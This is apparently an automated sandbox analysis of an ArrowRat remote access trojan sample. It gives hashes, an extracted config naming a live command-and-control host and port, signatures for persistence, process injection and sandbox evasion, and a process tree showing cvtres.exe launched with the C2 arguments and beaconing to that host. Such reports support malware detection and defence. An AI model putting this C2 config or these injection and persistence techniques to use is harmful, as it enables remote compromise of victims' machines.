Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04-05-2023 12:31

General

  • Target

    arrow/150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe

  • Size

    138KB

  • MD5

    a771f2894d94322a49b0ce2e14493a3e

  • SHA1

    63cd63601410fe6be499a9102cbbd6c675e72f56

  • SHA256

    150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a

  • SHA512

    ab75a88fbc2a8fd5320fdddb525af9a70c3553fa33b967545d4491a0ecd2e24869caeea49fdd7324d4ed666c42b8f5444c474056dddda0746af135bb97478765

  • SSDEEP

    3072:6bvA5mz7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/Yd:6bv4S7BqjjYHdrqkL/

Malware Config

Extracted

Family

arrowrat

Botnet

AG35PW

C2

androidmedallo.duckdns.org:1338

Mutex

ZD2651

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  • Modifies Installed Components in the registry (2 TTPs, 1 IoC)
  • Enumerates connected drives (3 TTPs, 1 IoC)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext (1 IoC)
  • Checks SCSI registry key(s) (3 TTPs, 22 IoCs)

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class (35 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (21 IoCs)
  • Suspicious use of FindShellTrayWindow (49 IoCs)
  • Suspicious use of SendNotifyMessage (21 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (10 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\arrow\150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe
    "C:\Users\Admin\AppData\Local\Temp\arrow\150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AG35PW androidmedallo.duckdns.org 1338 ZD2651
      2⤵
        PID:804
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3868
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4288
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3836

    Network

    • DNS
      176.122.125.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      176.122.125.40.in-addr.arpa
      IN PTR
      Response
    • DNS
      97.97.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.97.242.52.in-addr.arpa
      IN PTR
      Response
    • DNS
      217.106.137.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.106.137.52.in-addr.arpa
      IN PTR
      Response
    • DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • DNS
      2.36.159.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.36.159.162.in-addr.arpa
      IN PTR
      Response
    • DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • DNS
      50.4.107.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.4.107.13.in-addr.arpa
      IN PTR
      Response
    • DNS
      64.13.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      64.13.109.52.in-addr.arpa
      IN PTR
      Response
    • DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • 52.242.97.97:443
      tls
      1.6kB
      9
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 40.125.122.176:443
      260 B
      5
    • 20.189.173.14:443
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 8.247.211.254:80
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 8.247.211.254:80
      322 B
      7
    • 173.223.113.164:443
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      208 B
      4
    • 8.8.8.8:53
      176.122.125.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      176.122.125.40.in-addr.arpa

    • 8.8.8.8:53
      97.97.242.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      97.97.242.52.in-addr.arpa

    • 8.8.8.8:53
      217.106.137.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      217.106.137.52.in-addr.arpa

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      2.36.159.162.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      2.36.159.162.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      50.4.107.13.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      50.4.107.13.in-addr.arpa

    • 8.8.8.8:53
      64.13.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      64.13.109.52.in-addr.arpa

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133277297551854914.txt

      Filesize

      75KB

      MD5

      65019a5db517d9fb830d8a57406a03ea

      SHA1

      817faf2ffe8461f653519e7bd96e7ee75021c891

      SHA256

      3ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f

      SHA512

      bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62

    • memory/804-144-0x00000000061B0000-0x0000000006200000-memory.dmp

      Filesize

      320KB

    • memory/804-137-0x0000000005110000-0x00000000051A2000-memory.dmp

      Filesize

      584KB

    • memory/804-138-0x00000000051B0000-0x000000000524C000-memory.dmp

      Filesize

      624KB

    • memory/804-139-0x00000000059B0000-0x0000000005F54000-memory.dmp

      Filesize

      5.6MB

    • memory/804-140-0x0000000005930000-0x0000000005996000-memory.dmp

      Filesize

      408KB

    • memory/804-143-0x00000000052F0000-0x0000000005300000-memory.dmp

      Filesize

      64KB

    • memory/804-134-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

    • memory/804-275-0x00000000052F0000-0x0000000005300000-memory.dmp

      Filesize

      64KB

    • memory/2580-133-0x0000022D03130000-0x0000022D03158000-memory.dmp

      Filesize

      160KB

    • memory/3836-154-0x000001DFF40F0000-0x000001DFF4110000-memory.dmp

      Filesize

      128KB

    • memory/3836-157-0x000001DFF40B0000-0x000001DFF40D0000-memory.dmp

      Filesize

      128KB

    • memory/3836-161-0x000001DFF44C0000-0x000001DFF44E0000-memory.dmp

      Filesize

      128KB

    • memory/3868-148-0x00000000033A0000-0x00000000033A1000-memory.dmp

      Filesize

      4KB